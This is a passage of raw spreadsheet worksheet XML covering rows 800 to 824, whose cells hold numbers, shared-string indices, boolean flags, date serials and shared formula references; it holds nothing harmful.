      <c r="S800" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="1">
        <v>10088.0</v>
      </c>
      <c r="B801" s="2" t="s">
        <v>3505</v>
      </c>
      <c r="C801" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D801" s="2" t="s">
        <v>3506</v>
      </c>
      <c r="E801" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F801" s="1" t="s">
        <v>1347</v>
      </c>
      <c r="G801" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H801" s="1" t="s">
        <v>3507</v>
      </c>
      <c r="I801" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J801" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="K801" s="2" t="s">
        <v>3502</v>
      </c>
      <c r="L801" s="1">
        <v>5.0</v>
      </c>
      <c r="M801" s="1">
        <v>13.0</v>
      </c>
      <c r="N801" s="1" t="s">
        <v>3508</v>
      </c>
      <c r="O801" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="P801" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q801" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R801" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S801" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="1">
        <v>10089.0</v>
      </c>
      <c r="B802" s="2" t="s">
        <v>3509</v>
      </c>
      <c r="C802" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D802" s="2" t="s">
        <v>3506</v>
      </c>
      <c r="E802" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F802" s="1" t="s">
        <v>500</v>
      </c>
      <c r="G802" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H802" s="1" t="s">
        <v>3510</v>
      </c>
      <c r="I802" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J802" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="K802" s="2" t="s">
        <v>3502</v>
      </c>
      <c r="L802" s="1">
        <v>5.0</v>
      </c>
      <c r="M802" s="1">
        <v>13.0</v>
      </c>
      <c r="N802" s="1" t="s">
        <v>3152</v>
      </c>
      <c r="O802" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="P802" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q802" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R802" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S802" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="1">
        <v>10091.0</v>
      </c>
      <c r="B803" s="2" t="s">
        <v>3511</v>
      </c>
      <c r="C803" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D803" s="2" t="s">
        <v>3512</v>
      </c>
      <c r="E803" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F803" s="1" t="s">
        <v>3513</v>
      </c>
      <c r="G803" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H803" s="1" t="s">
        <v>3514</v>
      </c>
      <c r="I803" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J803" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="K803" s="2" t="s">
        <v>3502</v>
      </c>
      <c r="L803" s="1">
        <v>5.0</v>
      </c>
      <c r="M803" s="1">
        <v>13.0</v>
      </c>
      <c r="N803" s="1" t="s">
        <v>285</v>
      </c>
      <c r="O803" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="P803" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q803" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R803" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S803" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="1">
        <v>10097.0</v>
      </c>
      <c r="B804" s="2" t="s">
        <v>3515</v>
      </c>
      <c r="C804" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D804" s="2" t="s">
        <v>3516</v>
      </c>
      <c r="E804" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F804" s="1" t="s">
        <v>500</v>
      </c>
      <c r="G804" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H804" s="1" t="s">
        <v>3517</v>
      </c>
      <c r="I804" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J804" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="K804" s="2" t="s">
        <v>3502</v>
      </c>
      <c r="L804" s="1">
        <v>5.0</v>
      </c>
      <c r="M804" s="1">
        <v>13.0</v>
      </c>
      <c r="N804" s="1" t="s">
        <v>2809</v>
      </c>
      <c r="O804" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="P804" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q804" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R804" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S804" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="1">
        <v>10099.0</v>
      </c>
      <c r="B805" s="2" t="s">
        <v>3518</v>
      </c>
      <c r="C805" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D805" s="2" t="s">
        <v>3519</v>
      </c>
      <c r="E805" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F805" s="1" t="s">
        <v>3520</v>
      </c>
      <c r="G805" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H805" s="1" t="s">
        <v>3521</v>
      </c>
      <c r="I805" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J805" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="K805" s="2" t="s">
        <v>3502</v>
      </c>
      <c r="L805" s="1">
        <v>5.0</v>
      </c>
      <c r="M805" s="1">
        <v>13.0</v>
      </c>
      <c r="N805" s="1" t="s">
        <v>3522</v>
      </c>
      <c r="O805" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="P805" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q805" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R805" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S805" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="1">
        <v>10100.0</v>
      </c>
      <c r="B806" s="2" t="s">
        <v>3523</v>
      </c>
      <c r="C806" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D806" s="2" t="s">
        <v>3524</v>
      </c>
      <c r="E806" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F806" s="1" t="s">
        <v>3525</v>
      </c>
      <c r="G806" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H806" s="5">
        <v>44114.18125</v>
      </c>
      <c r="I806" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J806" s="1" t="s">
        <v>3526</v>
      </c>
      <c r="K806" s="2" t="s">
        <v>3527</v>
      </c>
      <c r="L806" s="1">
        <v>1.0</v>
      </c>
      <c r="M806" s="1">
        <v>1.0</v>
      </c>
      <c r="N806" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O806" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P806" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q806" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R806" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S806" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="1">
        <v>10101.0</v>
      </c>
      <c r="B807" s="2" t="s">
        <v>3528</v>
      </c>
      <c r="C807" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D807" s="2" t="s">
        <v>3529</v>
      </c>
      <c r="E807" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F807" s="1" t="s">
        <v>3307</v>
      </c>
      <c r="G807" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H807" s="1" t="s">
        <v>3530</v>
      </c>
      <c r="I807" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J807" s="1" t="s">
        <v>3531</v>
      </c>
      <c r="K807" s="2" t="s">
        <v>3532</v>
      </c>
      <c r="L807" s="1">
        <v>3.0</v>
      </c>
      <c r="M807" s="1">
        <v>3.0</v>
      </c>
      <c r="N807" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O807" s="1" t="s">
        <v>3533</v>
      </c>
      <c r="P807" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q807" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R807" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S807" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="1">
        <v>10102.0</v>
      </c>
      <c r="B808" s="2" t="s">
        <v>3534</v>
      </c>
      <c r="C808" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D808" s="2" t="s">
        <v>3529</v>
      </c>
      <c r="E808" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F808" s="1" t="s">
        <v>3535</v>
      </c>
      <c r="G808" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H808" s="1" t="s">
        <v>3536</v>
      </c>
      <c r="I808" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J808" s="1" t="s">
        <v>3531</v>
      </c>
      <c r="K808" s="2" t="s">
        <v>3532</v>
      </c>
      <c r="L808" s="1">
        <v>3.0</v>
      </c>
      <c r="M808" s="1">
        <v>3.0</v>
      </c>
      <c r="N808" s="1" t="s">
        <v>3537</v>
      </c>
      <c r="O808" s="1" t="s">
        <v>3533</v>
      </c>
      <c r="P808" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q808" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R808" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S808" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="1">
        <v>10103.0</v>
      </c>
      <c r="B809" s="2" t="s">
        <v>3538</v>
      </c>
      <c r="C809" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D809" s="2" t="s">
        <v>3529</v>
      </c>
      <c r="E809" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F809" s="1" t="s">
        <v>3539</v>
      </c>
      <c r="G809" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H809" s="1" t="s">
        <v>3540</v>
      </c>
      <c r="I809" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J809" s="1" t="s">
        <v>3531</v>
      </c>
      <c r="K809" s="2" t="s">
        <v>3532</v>
      </c>
      <c r="L809" s="1">
        <v>3.0</v>
      </c>
      <c r="M809" s="1">
        <v>3.0</v>
      </c>
      <c r="N809" s="1" t="s">
        <v>3541</v>
      </c>
      <c r="O809" s="1" t="s">
        <v>3533</v>
      </c>
      <c r="P809" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q809" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R809" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S809" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="1">
        <v>10105.0</v>
      </c>
      <c r="B810" s="2" t="s">
        <v>3542</v>
      </c>
      <c r="C810" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D810" s="2" t="s">
        <v>3091</v>
      </c>
      <c r="E810" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F810" s="1" t="s">
        <v>1170</v>
      </c>
      <c r="G810" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H810" s="1" t="s">
        <v>3543</v>
      </c>
      <c r="I810" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J810" s="1" t="s">
        <v>3544</v>
      </c>
      <c r="K810" s="2" t="s">
        <v>3545</v>
      </c>
      <c r="L810" s="1">
        <v>8.0</v>
      </c>
      <c r="M810" s="1">
        <v>12.0</v>
      </c>
      <c r="N810" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O810" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="P810" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q810" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R810" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S810" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="1">
        <v>10106.0</v>
      </c>
      <c r="B811" s="2" t="s">
        <v>3547</v>
      </c>
      <c r="C811" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D811" s="2" t="s">
        <v>3091</v>
      </c>
      <c r="E811" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F811" s="1" t="s">
        <v>3548</v>
      </c>
      <c r="G811" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H811" s="1" t="s">
        <v>3549</v>
      </c>
      <c r="I811" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J811" s="1" t="s">
        <v>3544</v>
      </c>
      <c r="K811" s="2" t="s">
        <v>3545</v>
      </c>
      <c r="L811" s="1">
        <v>8.0</v>
      </c>
      <c r="M811" s="1">
        <v>12.0</v>
      </c>
      <c r="N811" s="1" t="s">
        <v>193</v>
      </c>
      <c r="O811" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="P811" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q811" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R811" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S811" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="1">
        <v>10108.0</v>
      </c>
      <c r="B812" s="2" t="s">
        <v>3550</v>
      </c>
      <c r="C812" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D812" s="2" t="s">
        <v>3091</v>
      </c>
      <c r="E812" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F812" s="1" t="s">
        <v>3551</v>
      </c>
      <c r="G812" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H812" s="1" t="s">
        <v>3552</v>
      </c>
      <c r="I812" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J812" s="1" t="s">
        <v>3544</v>
      </c>
      <c r="K812" s="2" t="s">
        <v>3545</v>
      </c>
      <c r="L812" s="1">
        <v>8.0</v>
      </c>
      <c r="M812" s="1">
        <v>12.0</v>
      </c>
      <c r="N812" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O812" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="P812" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q812" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R812" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S812" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="1">
        <v>10112.0</v>
      </c>
      <c r="B813" s="2" t="s">
        <v>3553</v>
      </c>
      <c r="C813" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D813" s="2" t="s">
        <v>3091</v>
      </c>
      <c r="E813" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F813" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G813" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H813" s="1" t="s">
        <v>3554</v>
      </c>
      <c r="I813" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J813" s="1" t="s">
        <v>3544</v>
      </c>
      <c r="K813" s="2" t="s">
        <v>3545</v>
      </c>
      <c r="L813" s="1">
        <v>8.0</v>
      </c>
      <c r="M813" s="1">
        <v>12.0</v>
      </c>
      <c r="N813" s="1" t="s">
        <v>3555</v>
      </c>
      <c r="O813" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="P813" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q813" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R813" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S813" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="1">
        <v>10117.0</v>
      </c>
      <c r="B814" s="2" t="s">
        <v>3556</v>
      </c>
      <c r="C814" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D814" s="2" t="s">
        <v>3557</v>
      </c>
      <c r="E814" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F814" s="1" t="s">
        <v>3558</v>
      </c>
      <c r="G814" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H814" s="4">
        <v>43658.21597222222</v>
      </c>
      <c r="I814" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J814" s="1" t="s">
        <v>3559</v>
      </c>
      <c r="K814" s="2" t="s">
        <v>3560</v>
      </c>
      <c r="L814" s="1">
        <v>4.0</v>
      </c>
      <c r="M814" s="1">
        <v>9.0</v>
      </c>
      <c r="N814" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O814" s="1" t="s">
        <v>3561</v>
      </c>
      <c r="P814" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q814" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R814" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S814" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="1">
        <v>10119.0</v>
      </c>
      <c r="B815" s="2" t="s">
        <v>3562</v>
      </c>
      <c r="C815" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D815" s="2" t="s">
        <v>3563</v>
      </c>
      <c r="E815" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F815" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G815" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H815" s="4">
        <v>43658.52569444444</v>
      </c>
      <c r="I815" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J815" s="1" t="s">
        <v>3559</v>
      </c>
      <c r="K815" s="2" t="s">
        <v>3560</v>
      </c>
      <c r="L815" s="1">
        <v>4.0</v>
      </c>
      <c r="M815" s="1">
        <v>9.0</v>
      </c>
      <c r="N815" s="1" t="s">
        <v>3564</v>
      </c>
      <c r="O815" s="1" t="s">
        <v>3561</v>
      </c>
      <c r="P815" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q815" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R815" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S815" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="1">
        <v>10120.0</v>
      </c>
      <c r="B816" s="2" t="s">
        <v>3565</v>
      </c>
      <c r="C816" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D816" s="2" t="s">
        <v>3557</v>
      </c>
      <c r="E816" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F816" s="1" t="s">
        <v>3566</v>
      </c>
      <c r="G816" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H816" s="4">
        <v>43658.55972222222</v>
      </c>
      <c r="I816" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J816" s="1" t="s">
        <v>3559</v>
      </c>
      <c r="K816" s="2" t="s">
        <v>3560</v>
      </c>
      <c r="L816" s="1">
        <v>4.0</v>
      </c>
      <c r="M816" s="1">
        <v>9.0</v>
      </c>
      <c r="N816" s="1" t="s">
        <v>3508</v>
      </c>
      <c r="O816" s="1" t="s">
        <v>3561</v>
      </c>
      <c r="P816" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q816" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R816" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S816" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="1">
        <v>10124.0</v>
      </c>
      <c r="B817" s="2" t="s">
        <v>3567</v>
      </c>
      <c r="C817" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D817" s="2" t="s">
        <v>3557</v>
      </c>
      <c r="E817" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F817" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G817" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H817" s="4">
        <v>43862.15277777778</v>
      </c>
      <c r="I817" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J817" s="1" t="s">
        <v>3559</v>
      </c>
      <c r="K817" s="2" t="s">
        <v>3560</v>
      </c>
      <c r="L817" s="1">
        <v>4.0</v>
      </c>
      <c r="M817" s="1">
        <v>9.0</v>
      </c>
      <c r="N817" s="1" t="s">
        <v>3568</v>
      </c>
      <c r="O817" s="1" t="s">
        <v>3561</v>
      </c>
      <c r="P817" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q817" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R817" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S817" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="1">
        <v>10126.0</v>
      </c>
      <c r="B818" s="2" t="s">
        <v>3569</v>
      </c>
      <c r="C818" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D818" s="2" t="s">
        <v>3570</v>
      </c>
      <c r="E818" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F818" s="1" t="s">
        <v>3571</v>
      </c>
      <c r="G818" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H818" s="1" t="s">
        <v>3572</v>
      </c>
      <c r="I818" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J818" s="1" t="s">
        <v>3573</v>
      </c>
      <c r="K818" s="2" t="s">
        <v>3574</v>
      </c>
      <c r="L818" s="1">
        <v>6.0</v>
      </c>
      <c r="M818" s="1">
        <v>6.0</v>
      </c>
      <c r="N818" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O818" s="1" t="s">
        <v>3575</v>
      </c>
      <c r="P818" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q818" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R818" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S818" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="1">
        <v>10128.0</v>
      </c>
      <c r="B819" s="2" t="s">
        <v>3576</v>
      </c>
      <c r="C819" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D819" s="2" t="s">
        <v>3570</v>
      </c>
      <c r="E819" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F819" s="1" t="s">
        <v>3577</v>
      </c>
      <c r="G819" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H819" s="1" t="s">
        <v>3578</v>
      </c>
      <c r="I819" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J819" s="1" t="s">
        <v>3573</v>
      </c>
      <c r="K819" s="2" t="s">
        <v>3574</v>
      </c>
      <c r="L819" s="1">
        <v>6.0</v>
      </c>
      <c r="M819" s="1">
        <v>6.0</v>
      </c>
      <c r="N819" s="1" t="s">
        <v>1108</v>
      </c>
      <c r="O819" s="1" t="s">
        <v>3575</v>
      </c>
      <c r="P819" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q819" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R819" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S819" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="1">
        <v>10131.0</v>
      </c>
      <c r="B820" s="2" t="s">
        <v>3579</v>
      </c>
      <c r="C820" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D820" s="2" t="s">
        <v>3570</v>
      </c>
      <c r="E820" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F820" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G820" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H820" s="1" t="s">
        <v>3580</v>
      </c>
      <c r="I820" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J820" s="1" t="s">
        <v>3573</v>
      </c>
      <c r="K820" s="2" t="s">
        <v>3574</v>
      </c>
      <c r="L820" s="1">
        <v>6.0</v>
      </c>
      <c r="M820" s="1">
        <v>6.0</v>
      </c>
      <c r="N820" s="1" t="s">
        <v>3581</v>
      </c>
      <c r="O820" s="1" t="s">
        <v>3575</v>
      </c>
      <c r="P820" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q820" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R820" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S820" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="1">
        <v>10132.0</v>
      </c>
      <c r="B821" s="2" t="s">
        <v>3582</v>
      </c>
      <c r="C821" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D821" s="2" t="s">
        <v>3583</v>
      </c>
      <c r="E821" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F821" s="1" t="s">
        <v>896</v>
      </c>
      <c r="G821" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H821" s="1" t="s">
        <v>3584</v>
      </c>
      <c r="I821" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J821" s="1" t="s">
        <v>3585</v>
      </c>
      <c r="K821" s="2" t="s">
        <v>3586</v>
      </c>
      <c r="L821" s="1">
        <v>1.0</v>
      </c>
      <c r="M821" s="1">
        <v>1.0</v>
      </c>
      <c r="N821" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O821" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P821" s="1" t="s">
        <v>3587</v>
      </c>
      <c r="Q821" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R821" s="2">
        <f t="shared" si="2"/>
        <v>13</v>
      </c>
      <c r="S821" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="1">
        <v>10133.0</v>
      </c>
      <c r="B822" s="2" t="s">
        <v>3588</v>
      </c>
      <c r="C822" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D822" s="2" t="s">
        <v>3589</v>
      </c>
      <c r="E822" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F822" s="1" t="s">
        <v>3590</v>
      </c>
      <c r="G822" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H822" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="I822" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J822" s="1" t="s">
        <v>3592</v>
      </c>
      <c r="K822" s="2" t="s">
        <v>3593</v>
      </c>
      <c r="L822" s="1">
        <v>1.0</v>
      </c>
      <c r="M822" s="1">
        <v>1.0</v>
      </c>
      <c r="N822" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O822" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P822" s="1" t="s">
        <v>2541</v>
      </c>
      <c r="Q822" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R822" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S822" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="1">
        <v>10134.0</v>
      </c>
      <c r="B823" s="2" t="s">
        <v>3594</v>
      </c>
      <c r="C823" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D823" s="2" t="s">
        <v>3595</v>
      </c>
      <c r="E823" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F823" s="1" t="s">
        <v>3596</v>
      </c>
      <c r="G823" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H823" s="1" t="s">
        <v>3597</v>
      </c>
      <c r="I823" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J823" s="1" t="s">
        <v>3598</v>
      </c>
      <c r="K823" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="L823" s="1">
        <v>6.0</v>
      </c>
      <c r="M823" s="1">
        <v>6.0</v>
      </c>
      <c r="N823" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O823" s="1" t="s">
        <v>3600</v>
      </c>
      <c r="P823" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q823" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R823" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S823" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="1">
        <v>10135.0</v>
      </c>
      <c r="B824" s="2" t="s">
        <v>3601</v>
      </c>
      <c r="C824" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D824" s="2" t="s">
        <v>3595</v>
      </c>
      <c r="E824" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F824" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G824" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H824" s="1" t="s">
        <v>3602</v>
      </c>
